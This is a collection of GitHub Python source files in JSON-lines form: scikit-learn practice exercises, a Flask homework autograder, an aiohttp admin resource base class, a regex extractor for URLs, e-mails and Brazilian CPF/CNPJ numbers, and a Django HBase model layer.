pd.read_csv('gapminder.csv')\n\ny = df['life'].values\nX = df['fertility'].values\n\ny = y.reshape(-1, 1)\nX = X.reshape(-1, 1)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, 
random_state=42)\n\nreg = LinearRegression()\nprediction_space = np.linspace(min(X), max(X)).reshape(-1,1)\n\nreg.fit(X_train, y_train)\ny_pred = reg.predict(prediction_space)\nprint(reg.score(X, y))\nplt.plot(prediction_space, y_pred, color='black', linewidth=3)\nplt.show()\n\ny_pred = reg.predict(X_test)\n\n# Compute and print R^2 and RMSE\nprint(\"R^2: {}\".format(all.score(X_test, y_test)))\nrmse = np.sqrt(mean_squared_error(y_test, y_pred))\nprint(\"Root Mean Squared Error: {}\".format(rmse))\n\n###K-fold cross validation\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_val_score\nreg = LinearRegression()\ncv_scores = cross_val_score(reg,X,y,cv=5)\n\nprint(cv_scores)\nprint(\"Average 5-Fold CV Score: {}\".format(np.mean(cv_scores)))\n\n###Reguralization\n#Lasso\nfrom sklearn.linear_model import Lasso\nlasso = Lasso(alpha=0.4,normalize=True)\nlasso.fit(X , y)\nlasso_coef =lasso.coef_ \nprint(lasso_coef)\n\n# Plot the coefficients\nplt.plot(range(len(datasets.columns)), lasso_coef)\nplt.xticks(range(len(datasets.columns)), datasets.columns.values, rotation=60)\nplt.margins(0.02)\nplt.show()\n\n#Regularization II: Ridge\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import cross_val_score\n\nalpha_space = np.logspace(-4, 0, 50)\nridge_scores = []\nridge_scores_std = []\nridge = Ridge(normalize=True)\n\nfor alpha in alpha_space:\n ridge.alpha = alpha\n ridge_cv_scores = cross_val_score(ridge, X, y, cv=10)\n ridge_scores.append(np.mean(ridge_cv_scores))\n ridge_scores_std.append(np.std(ridge_cv_scores))\n\n#display_plot(ridge_scores, ridge_scores_std)\n####Regularization ELASTIC NET a∗L1+b∗L2\n # Import necessary modules\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\n# Create train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.4, random_state=42)\n\n# Create the hyperparameter grid\nl1_space = np.linspace(0, 1, 30)\nparam_grid = {'l1_ratio': l1_space}\n\nelastic_net = ElasticNet()\n\n# Setup the GridSearchCV object: gm_cv\ngm_cv = GridSearchCV(elastic_net, param_grid, cv=5)\ngm_cv.fit(X_train, y_train)\ny_pred = gm_cv.predict(X_test)\nr2 = gm_cv.score(X_test, y_test)\nmse = mean_squared_error(y_test, y_pred)\nprint(\"Tuned ElasticNet l1 ratio: {}\".format(gm_cv.best_params_))\nprint(\"Tuned ElasticNet R squared: {}\".format(r2))\nprint(\"Tuned ElasticNet MSE: {}\".format(mse))\n", "repo_name": "AntonYurievNikolov/PythonTests", "sub_path": "Data Camp ML courses/Supervised and Pipes/Supervised with scikit-learn .py", "file_name": "Supervised with scikit-learn .py", "file_ext": "py", "file_size_in_byte": 4849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.load_digits", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 12, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", 
"line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 79, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "sklearn.datasets.columns", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "sklearn.datasets.columns", "line_number": 116, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 
118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "numpy.logspace", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.linear_model.ElasticNet", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "9763555449", "text": "import os\nimport sys\nimport pickle\nimport urllib.request\nDIR_PATH = os.path.dirname(os.path.realpath(__file__)) # NOQA\nsys.path.append(DIR_PATH) # NOQA\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\n\nfrom logging_config import logger\nfrom autograder import autograde, check_flake8\nfrom utils import make_dirs\n\n\napp = Flask(__name__)\nCORS(app)\n\nTASK_NUM = 8\n\n\n@app.route('/hi', methods=['GET'])\ndef hi():\n return jsonify(\n {\"message\": \"Hi! This is the server for Introduction to Computer.\"})\n\n\ndef get_data_and_ans_paths():\n public_data_filename = os.path.join(\n DIR_PATH, 'test_data', 'public_data.yaml')\n public_ans_filename = os.path.join(\n DIR_PATH, 'test_data', 'public_answers.yaml')\n\n private_data_filename = os.path.join(\n DIR_PATH, 'test_data', 'private_data.yaml')\n private_ans_filename = os.path.join(\n DIR_PATH, 'test_data', 'private_answers.yaml')\n\n # Dowonload private data\n try:\n private_data_url = os.environ.get('PRIVATE_DATA_URL')\n urllib.request.urlretrieve(private_data_url, private_data_filename)\n private_ans_url = os.environ.get('PRIVATE_ANS_URL')\n urllib.request.urlretrieve(private_ans_url, private_ans_filename)\n except Exception as err:\n logger.info(err, exc_info=True)\n\n return (\n public_data_filename, public_ans_filename,\n private_data_filename, private_ans_filename\n )\n\n\ndef grade():\n '''\n Get test results of all students in src/students/\n '''\n # Save results to a dict\n results = {}\n\n student_ids = os.listdir(os.path.join(DIR_PATH, 'students'))\n student_ids = [x[:-3] for x in student_ids if x[-3:] == '.py']\n for student_id in student_ids:\n student_result = {}\n\n (public_data_filename, public_ans_filename, private_data_filename,\n private_ans_filename) = get_data_and_ans_paths()\n # Test public data\n try:\n logger.info(\"Testing public data\")\n student_result['public_scores'] = autograde(\n student_id, range(1, TASK_NUM + 1),\n public_data_filename, public_ans_filename\n )\n student_result['import'] = \"Success\"\n except Exception as err:\n logger.info(err, exc_info=True)\n student_result['import'] = \"Failed\"\n\n # Test private data\n try:\n logger.info(\"Testing private data\")\n student_result['private_scores'] = autograde(\n student_id, range(1, TASK_NUM + 1),\n private_data_filename,\n private_ans_filename\n )\n except Exception as err:\n logger.info(err, exc_info=True)\n\n # Check flake8\n student_file = os.path.join(DIR_PATH, 'students', student_id + '.py')\n student_result['flake8'] = 
check_flake8(student_file)\n\n # Add to all results\n results[student_id] = student_result\n return {\n \"results\": results,\n \"task_num\": TASK_NUM,\n \"student_num\": len(student_ids)\n }\n\n\n@app.route('/get_results', methods=['GET'])\ndef get_results():\n return jsonify(results)\n\n\n# Dump results out offline to prevent servertimeout\nresults_dir = os.path.join(DIR_PATH, 'results')\nmake_dirs(results_dir)\nresults_filename = os.path.join(results_dir, 'results.pickle')\nif os.path.exists(results_filename):\n with open(results_filename, 'rb') as fin:\n results = pickle.load(fin)\nelse:\n results = grade()\n with open(results_filename, 'wb') as fout:\n pickle.dump(results, fout)\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "amjltc295/PythonHomework", "sub_path": "src/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 3611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 41, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 41, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 42, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 42, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 42, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 44, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 44, "usage_type": "name"}, {"api_name": "logging_config.logger.info", "line_number": 46, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 46, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "logging_config.logger.info", "line_number": 70, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 70, "usage_type": "name"}, {"api_name": "autograder.autograde", "line_number": 71, 
"usage_type": "call"}, {"api_name": "logging_config.logger.info", "line_number": 77, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 77, "usage_type": "name"}, {"api_name": "logging_config.logger.info", "line_number": 82, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 82, "usage_type": "name"}, {"api_name": "autograder.autograde", "line_number": 83, "usage_type": "call"}, {"api_name": "logging_config.logger.info", "line_number": 89, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "autograder.check_flake8", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "utils.make_dirs", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 115, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "11110242077", "text": "from abc import abstractmethod, ABCMeta\n\nfrom .security import Permissions, require\nfrom .utils import json_response, validate_query\n\n\nclass AbstractResource(metaclass=ABCMeta):\n\n def __init__(self, *, primary_key, resource_name=None):\n class_name = self.__class__.__name__.lower()\n self._resource_name = resource_name or class_name\n self._primary_key = primary_key\n\n @property\n def primary_key(self):\n return self._primary_key\n\n @abstractmethod\n async def list(self, request): # pragma: no cover\n await require(request, Permissions.view)\n q = validate_query(request.GET)\n assert q\n\n # total number of results should be supplied in separate\n headers = {'X-Total-Count': str(0)}\n return json_response({}, headers=headers)\n\n @abstractmethod\n async def detail(self, request): # pragma: no cover\n await require(request, Permissions.view)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n @abstractmethod\n async def create(self, request): # pragma: no cover\n await require(request, Permissions.add)\n return json_response({})\n\n @abstractmethod\n async def update(self, request): # pragma: no cover\n await require(request, Permissions.edit)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n @abstractmethod\n async def delete(self, request): # pragma: no cover\n await require(request, Permissions.delete)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n def setup(self, app, base_url):\n url = str(base_url / self._resource_name)\n url_id = url + '/{entity_id}'\n add_route = app.router.add_route\n add_route('GET', url, self.list)\n add_route('GET', url_id, self.detail)\n add_route('POST', url, self.create)\n add_route('PUT', url_id, self.update)\n add_route('DELETE', url_id, self.delete)\n", "repo_name": "roscopecoltran/sniperkit-services", "sub_path": 
"dockerfiles/front-end/admin-interface/aiohttp/admin-elastic/sps/aiohttp_admin/resource.py", "file_name": "resource.py", "file_ext": "py", "file_size_in_byte": 2071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 7, "usage_type": "name"}, {"api_name": "security.require", "line_number": 20, "usage_type": "call"}, {"api_name": "security.Permissions.view", "line_number": 20, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.validate_query", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.json_response", "line_number": 26, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 18, "usage_type": "name"}, {"api_name": "security.require", "line_number": 30, "usage_type": "call"}, {"api_name": "security.Permissions.view", "line_number": 30, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 30, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 33, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 28, "usage_type": "name"}, {"api_name": "security.require", "line_number": 37, "usage_type": "call"}, {"api_name": "security.Permissions.add", "line_number": 37, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 37, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 38, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 35, "usage_type": "name"}, {"api_name": "security.require", "line_number": 42, "usage_type": "call"}, {"api_name": "security.Permissions.edit", "line_number": 42, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 42, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 45, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 40, "usage_type": "name"}, {"api_name": "security.require", "line_number": 49, "usage_type": "call"}, {"api_name": "security.Permissions.delete", "line_number": 49, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 49, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 52, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "3221604569", "text": "from io import StringIO\nfrom fastapi import Depends\nimport pandas as pd\nimport re\n\nfrom api.crud.crud import create_excerpt_metadata, create_named_entity\nfrom api.model.schemas import ExcerptMetadataCreate, NamedEntityCreate\n\nfrom database.connection import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\ndef find_regex(id:str, text:str) -> list:\n docs=[]\n cnt=0\n\n url_extract_pattern = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n mail_extract_pattern = \"([a-z0-9_.-]+@[a-z0-9_.-]+)\"\n cpf_extract_pattern = \"\\d{3}\\.?\\d{3}\\.?\\d{3}\\-?\\d{2}\"\n cnpj_extract_pattern = \"\\d{2}\\.?\\d{3}\\.?\\d{3}\\/\\d{4}-\\d{2}\"\n\n for url in re.finditer(url_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': url.group(),\n 'start_offset': url.start(),\n 'end_offset': url.start() + len(url.group()),\n 'entity_type':\"URL\"})\n\n for 
email in re.finditer(mail_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': email.group(),\n 'start_offset': email.start(),\n 'end_offset': email.start() + len(email.group()),\n 'entity_type':\"E-mail\"})\n\n for cpf in re.finditer(cpf_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': cpf.group(),\n 'start_offset': cpf.start(),\n 'end_offset': cpf.start() + len(cpf.group()),\n 'entity_type':\"CPF\"})\n\n for cnpj in re.finditer(cnpj_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': cnpj.group(),\n 'start_offset': cnpj.start(),\n 'end_offset': cnpj.start() + len(cnpj.group()),\n 'entity_type':\"CNPJ\"})\n\n #if docs != []:\n # print(docs)\n #return docs\n\n return docs if docs else []\n\ndef execute_csv_regex(file):\n\n contents = file.file.read()\n s = str(contents,'utf-8')\n data = StringIO(s)\n df = pd.read_csv(data)\n\n count_excerpt = 0\n count_named_entities = 0\n for index, row in df.iterrows():\n\n result = str(row['excerpt']).replace('- ', '')\n docs = find_regex(row['excerpt_id'], result)\n excerpt_metadata = ExcerptMetadataCreate(excerpt_id=row['excerpt_id'], uf=row['source_state_code'], cidade=row['source_territory_name'], tema=row['excerpt_subthemes'], data=row['source_created_at'])\n db_gen = get_db()\n db = next(db_gen)\n count_excerpt+=1 if (create_excerpt_metadata(db, excerpt_metadata)) else False\n if len(docs) > 0:\n for name in docs:\n item = NamedEntityCreate(excerpt_id=name['excerpt_id'], content=name['content'], start_offset=name['start_offset'], end_offset=name['end_offset'], entity_type=name['entity_type'])\n\n count_named_entities+=1 if (create_named_entity(db, item)) else False\n\n return \"Saved \" + str(count_excerpt) + \" excerpt ids and \" + str(count_named_entities) + \" named entitites\"", "repo_name": "MLRG-CEFET-RJ/qdrec", "sub_path": "scripts/append_regex.py", "file_name": "append_regex.py", "file_ext": "py", "file_size_in_byte": 3322, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "database.connection.SessionLocal", "line_number": 12, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 27, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 36, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 45, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 54, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "api.model.schemas.ExcerptMetadataCreate", "line_number": 82, "usage_type": "call"}, {"api_name": "api.crud.crud.create_excerpt_metadata", "line_number": 85, "usage_type": "call"}, {"api_name": "api.model.schemas.NamedEntityCreate", "line_number": 88, "usage_type": "call"}, {"api_name": "api.crud.crud.create_named_entity", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "70418882410", "text": "from .exceptions import EmptyColumnError, BadRowKeyError\nfrom .fields import HBaseField, IntegerField, TimestampField\nfrom django.conf import settings\nfrom django_hbase.client import HBaseClient\n\nclass HBaseModel:\n\n class Meta:\n table_name = None\n row_key = () # None\n\n @classmethod\n def get_table(cls):\n conn = HBaseClient.get_connection()\n return conn.table(cls.get_table_name())\n\n @property\n def row_key(self):\n return self.serialize_row_key(self.__dict__)\n\n 
@classmethod\n def get_field_hash(cls):\n field_hash = {}\n for field in cls.__dict__:\n field_obj = getattr(cls, field)\n # 可以写成 for field, field_obj in cls.__dict__.items() 吗?\n if isinstance(field_obj, HBaseField):\n field_hash[field] = field_obj\n return field_hash\n\n def __init__(self, **kwargs):\n for key, field in self.get_field_hash().items():\n value = kwargs.get(key)\n setattr(self, key, value)\n\n @classmethod\n def init_from_row(cls, row_key, row_data):\n if not row_data:\n return None\n data = cls.deserialize_row_key(row_key)\n for column_key, column_value in row_data.items():\n # remove column family\n column_key = column_key.decode('utf-8')\n key = column_key[column_key.find(':') + 1:]\n data[key] = cls.deserialize_field(key, column_value)\n return cls(**data)\n\n @classmethod\n def serialize_row_key(cls, data, is_prefix=False):\n \"\"\"\n serialize dict to bytes (not str)\n {key1: val1} => b\"val1\"\n {key1: val1, key2: val2} => b\"val1:val2\"\n {key1: val1, key2: val2, key3: val3} => b\"val1:val2:val3\"\n \"\"\"\n field_hash = cls.get_field_hash()\n values = []\n for key in cls.Meta.row_key:\n field = field_hash.get(key)\n if field.column_family: # 也许这个不用了\n continue\n value = data.get(key)\n if value is None:\n if not is_prefix:\n raise BadRowKeyError(f\"{key} is missing in row key\")\n break\n value = cls.serialize_field(field, value)\n if ':' in value:\n raise BadRowKeyError(f\"{key} should not contain ':' in value: {value}\")\n values.append(value)\n return bytes(':'.join(values), encoding='utf-8')\n\n @classmethod\n def deserialize_row_key(cls, row_key):\n \"\"\"\n \"val1\" => {'key1': val1, 'key2': None, 'key3': None}\n \"val1:val2\" => {'key1': val1, 'key2': val2, 'key3': None}\n \"val1:val2:val3\" => {'key1': val1, 'key2': val2, 'key3': val3}\n \"\"\"\n data = {}\n if isinstance(row_key, bytes):\n row_key = row_key.decode('utf-8')\n\n # val1:val2 => val1:val2: 方便每次 find(':') 都能找到一个 val\n row_key = row_key + ':'\n for key in cls.Meta.row_key:\n index = row_key.find(':')\n if index == -1:\n break\n data[key] = cls.deserialize_field(key, row_key[:index])\n row_key = row_key[index + 1:]\n return data\n\n @classmethod\n def serialize_field(cls, field, value):\n value = str(value)\n if isinstance(field, IntegerField):\n # 因为排序规则是按照字典序排序,那么就可能出现 1 10 2 这样的排序\n # 解决的办法是固定 int 的位数为 16 位(8的倍数更容易利用空间),不足位补 0\n value = str(value)\n while len(value) < 16:\n value = '0' + value\n if field.reverse:\n value = value[::-1]\n return value\n\n @classmethod\n def deserialize_field(cls, key, value):\n field = cls.get_field_hash()[key]\n if field.reverse:\n value = value[::-1]\n if field.field_type in [IntegerField.field_type, TimestampField.field_type]:\n return int(value)\n return value\n\n @classmethod\n def serialize_row_data(cls, data):\n row_data = {}\n field_hash = cls.get_field_hash()\n for key, field in field_hash.items():\n if not field.column_family:\n continue\n column_key = '{}:{}'.format(field.column_family, key)\n column_value = data.get(key)\n if column_value is None:\n continue\n row_data[column_key] = cls.serialize_field(field, column_value)\n return row_data\n\n def save(self, batch=None):\n row_data = self.serialize_row_data(self.__dict__)\n if len(row_data) == 0:\n raise EmptyColumnError()\n if batch:\n batch.put(self.row_key, row_data)\n else:\n table = self.get_table()\n table.put(self.row_key, row_data)\n\n @classmethod\n def get(cls, **kwargs):\n row_key = cls.serialize_row_key(kwargs)\n table = cls.get_table()\n row_data = table.row(row_key)\n return 
cls.init_from_row(row_key, row_data)\n\n @classmethod\n def create(cls, batch=None, **kwargs):\n instance = cls(**kwargs)\n instance.save(batch=batch)\n return instance\n\n @classmethod\n def batch_create(cls, batch_data):\n table = cls.get_table()\n batch = table.batch()\n results = []\n for data in batch_data:\n results.append(cls.create(batch=batch, **data))\n batch.send()\n return results\n\n @classmethod\n def get_table_name(cls):\n if not cls.Meta.table_name:\n raise NotImplementedError('Missing table_name in HBaseModel meta class')\n if settings.TESTING:\n # return 'test_{}'.format(cls.Meta.table_name)\n return f'test_{cls.Meta.table_name}' # 现在流行这么写\n return cls.Meta.table_name\n\n @classmethod\n def drop_table(cls):\n if not settings.TESTING:\n raise Exception('You can not drop table outside of unit tests')\n conn = HBaseClient.get_connection()\n conn.delete_table(cls.get_table_name(), True)\n\n @classmethod\n def create_table(cls):\n if not settings.TESTING:\n raise Exception('You can not create table outside of unit tests')\n conn = HBaseClient.get_connection()\n # convert table name from bytes to str\n tables = [table.decode('utf-8') for table in conn.tables()]\n if cls.get_table_name() in tables:\n return\n column_families = {\n field.column_family: dict()\n for key, field in cls.get_field_hash().items()\n if field.column_family is not None\n }\n conn.create_table(cls.get_table_name(), column_families)\n\n # 实现一个 get_or_create 的方法,返回 (instance, created)\n\n @classmethod\n def serialize_row_key_from_tuple(cls, row_key_tuple):\n if row_key_tuple is None:\n return None\n data = {\n key: value\n for key, value in zip(cls.Meta.row_key, row_key_tuple)\n }\n return cls.serialize_row_key(data, is_prefix=True)\n\n @classmethod\n def filter(cls, start=None, stop=None, prefix=None, limit=None, reverse=False):\n # serialize tuple to str\n row_start = cls.serialize_row_key_from_tuple(start)\n row_stop = cls.serialize_row_key_from_tuple(stop)\n row_prefix = cls.serialize_row_key_from_tuple(prefix)\n\n # scan table\n table = cls.get_table()\n rows = table.scan(row_start, row_stop, row_prefix, limit=limit, reverse=reverse)\n\n # deserialize to instance list\n results = []\n for row_key, row_data in rows:\n instance = cls.init_from_row(row_key, row_data)\n results.append(instance)\n return results\n\n @classmethod\n def delete(cls, **kwargs):\n row_key = cls.serialize_row_key(kwargs)\n table = cls.get_table()\n return table.delete(row_key)", "repo_name": "joyu-ai/django-twitter", "sub_path": "django_hbase/models/hbase_models.py", "file_name": "hbase_models.py", "file_ext": "py", "file_size_in_byte": 7972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 14, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 14, "usage_type": "name"}, {"api_name": "fields.HBaseField", "line_number": 27, "usage_type": "argument"}, {"api_name": "exceptions.BadRowKeyError", "line_number": 65, "usage_type": "call"}, {"api_name": "exceptions.BadRowKeyError", "line_number": 69, "usage_type": "call"}, {"api_name": "fields.IntegerField", "line_number": 97, "usage_type": "argument"}, {"api_name": "fields.IntegerField.field_type", "line_number": 112, "usage_type": "attribute"}, {"api_name": "fields.IntegerField", "line_number": 112, "usage_type": "name"}, {"api_name": "fields.TimestampField.field_type", "line_number": 112, "usage_type": 
